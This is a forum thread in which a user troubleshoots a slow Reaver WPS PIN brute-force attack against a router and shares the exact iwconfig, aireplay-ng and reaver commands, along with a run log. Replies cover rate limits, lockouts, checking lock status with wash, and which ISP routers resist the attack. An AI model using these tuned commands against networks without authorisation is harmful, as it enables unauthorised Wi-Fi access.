Reaver --- Can't get faster than 42 seconds per pin!

[burnface]

So I'm not sure where to ask this, the mods at the Kali forums called this "general IT help" and deleted my question ha.

Anyway, I've been playing around with Reaver again with my new router, and like the title says, can't seem to get any faster than 42-ish seconds per pin.

The commands I used to even get it that 'fast' are as follows:

Change my interface to same channel as router:

iwconfig mon0 channel 1

Manually associate to my router:

aireplay-ng -1 0 -a <router bssid> -h <my mac address, of mon0> -e <router essid> mon0 --ignore-negative-one

My use of reaver:

reaver -i mon0 -b <router bssid> -T 1 -f -N -S -vv

All these commands are combinations of different suggestions I've seen places online, and this is what I've done to get it faster than the 50-60 sec/pin that I was getting :/

I've also tried using -r to make it pause for 60sec after 10 pin attempts, but then I would go up to 55 sec/pin again.

I've had roughly -50 power the whole time during this test.

Here's a chunk of my code running it overnight:

[+] Received M1 message

[+] Sending M2 message

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x03), re-trying last pin

[+] Trying pin 15535672

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[!] WARNING: Receive timeout occurred

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x02), re-trying last pin

[+] Trying pin 15535672

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[!] WARNING: Receive timeout occurred

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x02), re-trying last pin

[+] 14.19% complete @ 2014-08-09 08:21:06 (43 seconds/pin)

[+] Max time remaining at this rate: 112:44:37 (9439 pins left to try)

[+] Trying pin 15535672

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[!] WARNING: Receive timeout occurred

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x02), re-trying last pin

[+] Trying pin 15535672

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

Any suggestions that might speed this up?

Thanks!!

[Mr-Protocol]

There should be options to try and increase the speed, but by it's nature, it is a slow attack.

[burnface]

There should be options to try and increase the speed, but by it's nature, it is a slow attack.

I am using many of those options already, and even though it's slow, I shouldn't take more that 14 hours max. If mine keeps up like this, it is estimating over 115 hours! I will look into more ways to speed it up as well.

Thank you!

[Mr-Protocol]

Keep in mind, the attack is limited by the access points response and calculations of PINs. Some versions may have lockout times as well to thwart the attack.

[burnface]

Keep in mind, the attack is limited by the access points response and calculations of PINs. Some versions may have lockout times as well to thwart the attack.

I have been looking into that as much as I know how, but from what I can tell from the code, my router isn't actually locking the attack out? Or is that what the "WARNING: Receive Timeout Occurred" means?

Thanks again!

[Mr-Protocol]

I would say that may be the time out per key. I have not read the technical docs on the WPS but if you really want to dig into it, find the RFC or technical docs on how it works.

[burnface]

I would say that may be the time out per key. I have not read the technical docs on the WPS but if you really want to dig into it, find the RFC or technical docs on how it works.

I will continue to look into all that some more!

[ZaraByte]

It can take days to crack a WPS if the router is set to lock out after so many failed attempts. In the real world you're looking at least 10+ hours to days at a slow pin try rate.

Newer routers these days will lock wps if too many failed try's are made people in videos that crack wps are either lucky or they have speeded up the time

[burnface]

It can take days to crack a WPS if the router is set to lock out after so many failed attempts. In the real world you're looking at least 10+ hours to days at a slow pin try rate.

Newer routers these days will lock wps if too many failed try's are made people in videos that crack wps are either lucky or they have speeded up the time

If the router locks wps, wouldn't that show in the running code? Also thanks for the reply!

[Mr-Protocol]

https://code.google.com/p/reaver-wps/w/list

[ZaraByte]

If the router locks wps, wouldn't that show in the running code? Also thanks for the reply!

Nope, what will happen is it should start giving errors and possibly keep trying the same pin over and over the only way to see if the router has locked wps is to run wash -i mon0 to see if wps lock says yes,

You wanna make sure that you had a good signal to the target router at least over 50 otherwise you're gonna have signal issues. a 70% Signal should be good if it stays like that.

ISP's here in the US like Comcast and Centurylink offer their customers pretty much a wps attack proof router / dsl/ cable bundle i've came across routers that start with like HOME- are a comcast customer and likely have a Technicolor router and i've tried targeting them they lock wps after 3 try's even at a slow rate.